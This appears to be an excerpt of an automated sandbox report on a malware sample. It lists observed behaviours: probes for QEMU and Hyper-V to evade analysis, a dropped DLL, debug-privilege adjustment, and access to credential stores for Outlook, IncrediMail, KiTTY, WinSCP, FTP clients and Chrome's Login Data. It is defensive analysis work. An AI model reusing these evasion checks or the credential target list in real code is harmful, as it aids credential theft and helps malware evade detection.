Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Process information set: NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll

Jump to dropped file

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_0040626D FindFirstFileA,FindClose,		1_2_0040626D
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		1_2_00405732
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Code function: 1_2_004026FE FindFirstFileA,		1_2_004026FE

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	API call chain: ExitProcess graph end node

Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4895164716.00000000024E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[A

Anti Debugging

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_6ED71A9C

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,

1_2_00402D63

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe

Jump to behavior

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004031D6

Stealing of Sensitive Information

Source: Yara match

File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts			Jump to behavior
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts			Jump to behavior

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Remote Access Functionality

Source: Yara match

File source: dump.pcap, type: PCAP